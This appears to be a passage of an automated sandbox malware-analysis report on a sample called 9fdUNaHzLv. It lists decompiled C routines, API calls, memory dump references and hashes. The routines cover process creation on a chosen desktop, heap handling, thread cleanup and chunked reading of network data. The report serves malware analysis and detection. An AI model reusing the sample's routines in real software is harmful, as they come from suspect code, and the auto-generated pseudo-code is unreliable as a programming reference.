                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F82), ref: 00D18A7E
                                                                                        • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00D18F82), ref: 00D18A85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1073023709-0
                                                                                        • Opcode ID: 44c265fa11e33f2b5d20a3ba87b3464606d395812a14564d8f359472dcdbcdba
                                                                                        • Instruction ID: a31183f4112c1611ad7fce0abb68728f57570b29a6cb9b2e31c5beadfd943278
                                                                                        • Opcode Fuzzy Hash: 44c265fa11e33f2b5d20a3ba87b3464606d395812a14564d8f359472dcdbcdba
                                                                                        • Instruction Fuzzy Hash: CE31CF71A80702BBDB11DF69EC41BE9B7A4AF84700F248115E945E7381EF70D882EBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E00D12180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
                                                                                        				char _v8;
                                                                                        				struct _STARTUPINFOW _v76;
                                                                                        				int _t29;
                                                                                        				WCHAR* _t31;
                                                                                        				int _t35;
                                                                                        				void* _t36;
                                                                                        
                                                                                        				_t35 = 0;
                                                                                        				_t31 = __ecx;
                                                                                        				memset( &_v76, 0, 0x44);
                                                                                        				_t36 = _a4;
                                                                                        				_v76.cb = 0x44;
                                                                                        				if(_t36 == 0) {
                                                                                        					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
                                                                                        				} else {
                                                                                        					_t5 = _t35 + 0x10; // 0x10
                                                                                        					E00D11830(0xd11030, _t5, 0x47deb7fb,  &_a4);
                                                                                        					_v76.lpDesktop = _a4;
                                                                                        					_push(0);
                                                                                        					_push(_t36);
                                                                                        					_push( &_v8);
                                                                                        					if( *0xd1c21c() != 0) {
                                                                                        						_t29 =  *0xd1c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
                                                                                        						_t35 = _t29;
                                                                                        						 *0xd1c220(_v8);
                                                                                        					}
                                                                                        					HeapFree(GetProcessHeap(), 0, _a4);
                                                                                        					return _t35;
                                                                                        				}
                                                                                        			}









                                                                                        0x00d1218b
                                                                                        0x00d12192
                                                                                        0x00d12194
                                                                                        0x00d1219a
                                                                                        0x00d121a0
                                                                                        0x00d121a9
                                                                                        0x00d1223e
                                                                                        0x00d121ab
                                                                                        0x00d121b9
                                                                                        0x00d121bc
                                                                                        0x00d121c7
                                                                                        0x00d121cd
                                                                                        0x00d121ce
                                                                                        0x00d121cf
                                                                                        0x00d121d8
                                                                                        0x00d121f0
                                                                                        0x00d121f9
                                                                                        0x00d121fb
                                                                                        0x00d121fb
                                                                                        0x00d1220d
                                                                                        0x00d1221b
                                                                                        0x00d1221b

                                                                                        APIs
                                                                                        • memset.NTDLL ref: 00D12194
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00D1A52C), ref: 00D12232
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D12206
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1220D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateCreateFreememset
                                                                                        • String ID: D
                                                                                        • API String ID: 3667606640-2746444292
                                                                                        • Opcode ID: d5ccc163372cfbee0d17f2089e96d3433d19ea702aa1c309b0acd3a5fd81c335
                                                                                        • Instruction ID: 234be1cfd84cfc98de94f0c8da5a09b8d9872ed3e41680422b2f54544a76c8ac
                                                                                        • Opcode Fuzzy Hash: d5ccc163372cfbee0d17f2089e96d3433d19ea702aa1c309b0acd3a5fd81c335
                                                                                        • Instruction Fuzzy Hash: 2A116D76650208BBDB109B95EC48EDF7F7CEB85755F048025FA08D6240DA31999687B4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00D12422
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D12429
                                                                                        • memcpy.NTDLL(00D18583,?,?), ref: 00D12467
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D18583), ref: 00D1250A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D12511
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 461410222-0
                                                                                        • Opcode ID: 8ebe9b129ed41c50c748c0ec523d0ea00a81bf84ea55780649c7e06b52363518
                                                                                        • Instruction ID: 8b8bf14d6b5c09fe7eb2ef38b40fdcfd33a9f64c651922b383f004c26b64a017
                                                                                        • Opcode Fuzzy Hash: 8ebe9b129ed41c50c748c0ec523d0ea00a81bf84ea55780649c7e06b52363518
                                                                                        • Instruction Fuzzy Hash: 2C415D71A40209FFEB11CFA4EC44FEEBBB9EB48300F148069E905E7261DB319A54DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00D18644,?), ref: 00D1256D
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D12574
                                                                                        • memcpy.NTDLL(00D18644,?,?), ref: 00D125AE
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D18644), ref: 00D1260C
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D12613
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 461410222-0
                                                                                        • Opcode ID: 3dca857677c2485289b8689c962b93f4f69f6f1a8333c49dbe18698cd5cf8b28
                                                                                        • Instruction ID: 0a5b5d1f606219a6638cbf98371703492fa7dde6c19a70be6f8db09213921cd9
                                                                                        • Opcode Fuzzy Hash: 3dca857677c2485289b8689c962b93f4f69f6f1a8333c49dbe18698cd5cf8b28
                                                                                        • Instruction Fuzzy Hash: AB318171680305BFEB118FA4EC85BE9BBB9FF08700F144161F905D62A0DB72D9A19BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D18290(int* __ecx, signed int _a8) {
                                                                                        				intOrPtr _t66;
                                                                                        				int* _t88;
                                                                                        				signed int _t89;
                                                                                        				void* _t90;
                                                                                        
                                                                                        				_t89 = _a8;
                                                                                        				_t88 = __ecx;
                                                                                        				 *__ecx = 0;
                                                                                        				__ecx[1] = 0;
                                                                                        				__ecx[2] = _t89;
                                                                                        				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
                                                                                        				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
                                                                                        				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
                                                                                        				if((_t89 & 0x00008000) == 0) {
                                                                                        					_t17 = _t88 + 0x29272; // 0x29272
                                                                                        					memset(_t17, 0, 0x10000);
                                                                                        					_t90 = _t90 + 0xc;
                                                                                        				}
                                                                                        				_t18 = _t88 + 0x9273; // 0x9273
                                                                                        				 *(_t88 + 0x44) = 0;
                                                                                        				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
                                                                                        				_t21 = _t88 + 0x9272; // 0x9272
                                                                                        				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
                                                                                        				_t23 = _t88 + 0x39272; // 0x39272
                                                                                        				_t66 = _t23;
                                                                                        				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
                                                                                        				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
                                                                                        				_t26 = _t88 + 0x8192; // 0x8192
                                                                                        				 *(_t88 + 0x40) = 0;
                                                                                        				 *(_t88 + 0x3c) = 0;
                                                                                        				 *(_t88 + 0x24) = 0;
                                                                                        				 *(_t88 + 0x20) = 0;
                                                                                        				 *(_t88 + 0x1c) = 0;
                                                                                        				 *(_t88 + 0x68) = 0;
                                                                                        				 *(_t88 + 0x48) = 0;
                                                                                        				 *(_t88 + 0x64) = 0;
                                                                                        				 *(_t88 + 0x60) = 0;
                                                                                        				 *(_t88 + 0x5c) = 0;
                                                                                        				 *(_t88 + 0x58) = 0;
                                                                                        				 *((intOrPtr*)(_t88 + 0x38)) = 8;
                                                                                        				 *(_t88 + 0x6c) = 0;
                                                                                        				 *(_t88 + 0x54) = 0;
                                                                                        				 *(_t88 + 0x50) = 0;
                                                                                        				 *(_t88 + 0x4c) = 0;
                                                                                        				 *((intOrPtr*)(_t88 + 0x18)) = 1;
                                                                                        				 *(_t88 + 0x70) = 0;
                                                                                        				 *(_t88 + 0x74) = 0;
                                                                                        				 *(_t88 + 0x78) = 0;
                                                                                        				 *(_t88 + 0x7c) = 0;
                                                                                        				 *(_t88 + 0x80) = 0;
                                                                                        				 *(_t88 + 0x84) = 0;
                                                                                        				 *(_t88 + 0x88) = 0;
                                                                                        				 *(_t88 + 0x8c) = 0;
                                                                                        				memset(_t26, 0, 0x240);
                                                                                        				_t52 = _t88 + 0x83d2; // 0x83d2
                                                                                        				memset(_t52, 0, 0x40);
                                                                                        				return 0;
                                                                                        			}







                                                                                        0x00d18294
                                                                                        0x00d182aa
                                                                                        0x00d182bc
                                                                                        0x00d182c2
                                                                                        0x00d182c9
                                                                                        0x00d182cc
                                                                                        0x00d182d4
                                                                                        0x00d182ef
                                                                                        0x00d182f8
                                                                                        0x00d182ff
                                                                                        0x00d18308
                                                                                        0x00d1830e
                                                                                        0x00d1830e
                                                                                        0x00d18311
                                                                                        0x00d18317
                                                                                        0x00d1831e
                                                                                        0x00d18321
                                                                                        0x00d18327
                                                                                        0x00d1832a
                                                                                        0x00d1832a
                                                                                        0x00d18335
                                                                                        0x00d18338
                                                                                        0x00d1833b
                                                                                        0x00d18344
                                                                                        0x00d1834b
                                                                                        0x00d18352
                                                                                        0x00d18359
                                                                                        0x00d18360
                                                                                        0x00d18367
                                                                                        0x00d1836e
                                                                                        0x00d18375
                                                                                        0x00d1837c
                                                                                        0x00d18383
                                                                                        0x00d1838a
                                                                                        0x00d18391
                                                                                        0x00d18398
                                                                                        0x00d1839f
                                                                                        0x00d183a6
                                                                                        0x00d183ad
                                                                                        0x00d183b4
                                                                                        0x00d183bb
                                                                                        0x00d183c2
                                                                                        0x00d183c9
                                                                                        0x00d183d0
                                                                                        0x00d183d7
                                                                                        0x00d183e1
                                                                                        0x00d183eb
                                                                                        0x00d183f5
                                                                                        0x00d183ff
                                                                                        0x00d18407
                                                                                        0x00d18410
                                                                                        0x00d1841e

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: VUUU$VUUU
                                                                                        • API String ID: 2221118986-3149182767
                                                                                        • Opcode ID: 280e2d48ea45146d072c21067c8b66af3f50ec0d245e66c29fe1a1f923e5a617
                                                                                        • Instruction ID: f69bd21e92789fb31a51d026117b203bde6bddd58da6f2fbc52ed85f82949d17
                                                                                        • Opcode Fuzzy Hash: 280e2d48ea45146d072c21067c8b66af3f50ec0d245e66c29fe1a1f923e5a617
                                                                                        • Instruction Fuzzy Hash: 7141CCB1640A06BBE304CF65C459782FBE4FF44708F148219D5598BB80D7BAB169CFC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • _snwprintf.NTDLL ref: 00D199E3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D18F37), ref: 00D19A5E
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19A65
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D19A70
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19A77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Free$Allocate_snwprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2579732983-0
                                                                                        • Opcode ID: 456a3c84a40482494b877f32eb255441c2d5e923406cde4d3f511225f10f820a
                                                                                        • Instruction ID: 7c726dbd3716c8f4649b8d50b1d4007203350928291ec461fe172da92c15dcd0
                                                                                        • Opcode Fuzzy Hash: 456a3c84a40482494b877f32eb255441c2d5e923406cde4d3f511225f10f820a
                                                                                        • Instruction Fuzzy Hash: 81219D75AD0308FBEB109BE0AC4AFD9776DAB08700F105061FB04E52A1DEB1AA858B74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D18AA0() {
                                                                                        				int _t8;
                                                                                        				void* _t16;
                                                                                        				void* _t17;
                                                                                        
                                                                                        				_t17 =  *0xd1c274; // 0x0
                                                                                        				if(_t17 != 0) {
                                                                                        					do {
                                                                                        						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
                                                                                        						_t17 =  *_t17;
                                                                                        					} while (_t17 != 0);
                                                                                        					_t17 =  *0xd1c274; // 0x0
                                                                                        				}
                                                                                        				_t16 = 0xd1c274;
                                                                                        				while(_t17 != 0) {
                                                                                        					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
                                                                                        					if(_t8 == 0x102) {
                                                                                        						_t16 = _t17;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
                                                                                        						VirtualFree( *(_t17 + 8), 0, 0x8000);
                                                                                        						CloseHandle( *(_t17 + 0x10));
                                                                                        						 *_t16 =  *_t17;
                                                                                        						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
                                                                                        					}
                                                                                        					_t17 =  *_t16;
                                                                                        				}
                                                                                        				return _t8;
                                                                                        			}






                                                                                        0x00d18aa1
                                                                                        0x00d18aaa
                                                                                        0x00d18ab0
                                                                                        0x00d18aba
                                                                                        0x00d18abc
                                                                                        0x00d18abe
                                                                                        0x00d18ac2
                                                                                        0x00d18ac2
                                                                                        0x00d18ac8
                                                                                        0x00d18acf
                                                                                        0x00d18ad6
                                                                                        0x00d18ae1
                                                                                        0x00d18b1e
                                                                                        0x00d18ae3
                                                                                        0x00d18aed
                                                                                        0x00d18af9
                                                                                        0x00d18b02
                                                                                        0x00d18b0d
                                                                                        0x00d18b16
                                                                                        0x00d18b16
                                                                                        0x00d18b20
                                                                                        0x00d18b22
                                                                                        0x00d18b28

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00D19315,00D19286), ref: 00D18AD6
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D18AF9
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D18B02
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D18B0F
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
                                                                                        • String ID:
                                                                                        • API String ID: 797926041-0
                                                                                        • Opcode ID: e7fe4d717fd7084d44ef2e9eb80ac738047e4738b8fca33dd8a35fe38af1d1c6
                                                                                        • Instruction ID: 4030e1c8642ecd6d889212101117dbd6078433761141969ab7f8dffaaf7a489e
                                                                                        • Opcode Fuzzy Hash: e7fe4d717fd7084d44ef2e9eb80ac738047e4738b8fca33dd8a35fe38af1d1c6
                                                                                        • Instruction Fuzzy Hash: 5C012132694721BBDB318F54EC05B8677A1AF45B20F158614F9A5E73A0CF70BC829BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D188B0(long __ecx) {
                                                                                        				int _t6;
                                                                                        				long _t13;
                                                                                        				void* _t15;
                                                                                        				void* _t16;
                                                                                        
                                                                                        				_t16 =  *0xd1c274; // 0x0
                                                                                        				_t13 = __ecx;
                                                                                        				_t15 = 0xd1c274;
                                                                                        				while(_t16 != 0) {
                                                                                        					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
                                                                                        					if(_t6 == 0x102) {
                                                                                        						_t15 = _t16;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
                                                                                        						VirtualFree( *(_t16 + 8), 0, 0x8000);
                                                                                        						CloseHandle( *(_t16 + 0x10));
                                                                                        						 *_t15 =  *_t16;
                                                                                        						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
                                                                                        					}
                                                                                        					_t16 =  *_t15;
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}







                                                                                        0x00d188b2
                                                                                        0x00d188b8
                                                                                        0x00d188bb
                                                                                        0x00d188c2
                                                                                        0x00d188c8
                                                                                        0x00d188d3
                                                                                        0x00d18910
                                                                                        0x00d188d5
                                                                                        0x00d188df
                                                                                        0x00d188eb
                                                                                        0x00d188f4
                                                                                        0x00d188ff
                                                                                        0x00d18908
                                                                                        0x00d18908
                                                                                        0x00d18912
                                                                                        0x00d18914
                                                                                        0x00d1891b

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,00D18F3E), ref: 00D188C8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,00D18F3E), ref: 00D188EB
                                                                                        • CloseHandle.KERNEL32(?,?,000DBBA0,?,00D18F3E), ref: 00D188F4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00D18F3E), ref: 00D18901
                                                                                        • HeapFree.KERNEL32(00000000,?,000DBBA0,?,00D18F3E), ref: 00D18908
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
                                                                                        • String ID:
                                                                                        • API String ID: 797926041-0
                                                                                        • Opcode ID: 1e642f74aaba072da3840e9c56069007cc5f5f2ddc1b2af26a075d75e19995b5
                                                                                        • Instruction ID: bec000db1e19f2c96a24a05194972d81e5ba8f97ee04a264817f276bd7c07cb4
                                                                                        • Opcode Fuzzy Hash: 1e642f74aaba072da3840e9c56069007cc5f5f2ddc1b2af26a075d75e19995b5
                                                                                        • Instruction Fuzzy Hash: 2CF08C71690310BBEB214BA4EC48B9677A5EF08721F248524F981D72A1CF70AC819FA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 30%
                                                                                        			E00D11E50(void* __ecx, void** __edx, long* _a4) {
                                                                                        				long _v8;
                                                                                        				long _v12;
                                                                                        				long _v16;
                                                                                        				void** _v20;
                                                                                        				long _t36;
                                                                                        				void* _t42;
                                                                                        				long _t46;
                                                                                        				void* _t49;
                                                                                        				void* _t52;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				_push(0);
                                                                                        				_v20 = __edx;
                                                                                        				_push( &_v8);
                                                                                        				_v8 = 4;
                                                                                        				_t42 = __ecx;
                                                                                        				_push( &_v16);
                                                                                        				_push(0x20000005);
                                                                                        				_push( *((intOrPtr*)(__ecx + 8)));
                                                                                        				if( *0xd1c238() == 0) {
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
                                                                                        					if(_t49 == 0) {
                                                                                        						return 0;
                                                                                        					} else {
                                                                                        						_v8 = 0;
                                                                                        						_v12 = 0;
                                                                                        						_t53 =  *0xd1c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
                                                                                        						if(_t53 == 0) {
                                                                                        							L7:
                                                                                        							HeapFree(GetProcessHeap(), 0, _t49);
                                                                                        							if(_t53 != 0) {
                                                                                        								goto L8;
                                                                                        							}
                                                                                        						} else {
                                                                                        							while(1) {
                                                                                        								_t36 = _v12;
                                                                                        								if(_t36 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t46 = _v8 + _t36;
                                                                                        								_v8 = _t46;
                                                                                        								_t53 =  *0xd1c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
                                                                                        								if(_t53 != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L7;
                                                                                        								}
                                                                                        								goto L9;
                                                                                        							}
                                                                                        							if(_t53 != 0) {
                                                                                        								L8:
                                                                                        								 *_v20 = _t49;
                                                                                        								 *_a4 = _v8;
                                                                                        							} else {
                                                                                        								goto L7;
                                                                                        							}
                                                                                        						}
                                                                                        						L9:
                                                                                        						return _t53;
                                                                                        					}
                                                                                        				}
                                                                                        			}













                                                                                        0x00d11e57
                                                                                        0x00d11e5c
                                                                                        0x00d11e5f
                                                                                        0x00d11e63
                                                                                        0x00d11e6a
                                                                                        0x00d11e6c
                                                                                        0x00d11e6d
                                                                                        0x00d11e72
                                                                                        0x00d11e7d
                                                                                        0x00d11f30
                                                                                        0x00d11e83
                                                                                        0x00d11e96
                                                                                        0x00d11e9a
                                                                                        0x00d11f29
                                                                                        0x00d11ea0
                                                                                        0x00d11ea4
                                                                                        0x00d11eaf
                                                                                        0x00d11ec0
                                                                                        0x00d11ec4
                                                                                        0x00d11ef8
                                                                                        0x00d11f02
                                                                                        0x00d11f0a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11ec6
                                                                                        0x00d11ec6
                                                                                        0x00d11ec6
                                                                                        0x00d11ecb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11ed0
                                                                                        0x00d11edb
                                                                                        0x00d11eec
                                                                                        0x00d11ef0
                                                                                        0x00000000
                                                                                        0x00d11ef2
                                                                                        0x00000000
                                                                                        0x00d11ef2
                                                                                        0x00000000
                                                                                        0x00d11ef0
                                                                                        0x00d11ef6
                                                                                        0x00d11f0c
                                                                                        0x00d11f12
                                                                                        0x00d11f17
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11ef6
                                                                                        0x00d11f19
                                                                                        0x00d11f21
                                                                                        0x00d11f21
                                                                                        0x00d11e9a

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00D18631), ref: 00D11E89
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D11E90
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D11EFB
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D11F02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 576844849-0
                                                                                        • Opcode ID: 64620bb39f6366a4a7dea67c5747cd77a4a7babb8e767f25d3e85390a57a7497
